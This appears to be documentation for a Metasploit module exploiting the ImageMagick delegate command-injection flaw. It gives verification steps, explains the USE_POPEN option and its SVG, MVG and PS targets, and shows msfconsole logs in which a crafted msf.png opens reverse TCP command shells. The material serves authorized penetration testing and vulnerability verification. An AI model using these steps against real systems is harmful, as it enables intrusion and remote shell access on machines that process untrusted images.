1.5 KiB
1.5 KiB
Vulnerable Application
ImageMagick
Verification Steps
Example steps in this format:
- Install the ImageMagick
- Start msfconsole
- Do:
use exploits/unix/fileformat/imagemagick_delegate - Do:
run - convert msf.png msf.jpg
Options
USE_POPEN
When the default option true is used, targets 0 (SVG file) and 1 (MVG file) are valid
When the option is set to false, target 2 (PS file) is valid
Scenarios
popen=true
msf exploit(imagemagick_delegate) > set target 0
msf exploit(imagemagick_delegate) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
[*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500
msf exploit(imagemagick_delegate) > set target 1
msf exploit(imagemagick_delegate) > run
[*] Started reverse TCP handler on 10.6.0.186:4444
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
[*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500
popen=false
msf exploit(imagemagick_delegate) > set target 2
target => 2
msf exploit(imagemagick_delegate) > set USE_POPEN false
USE_POPEN => false
msf exploit(imagemagick_delegate) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
[*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500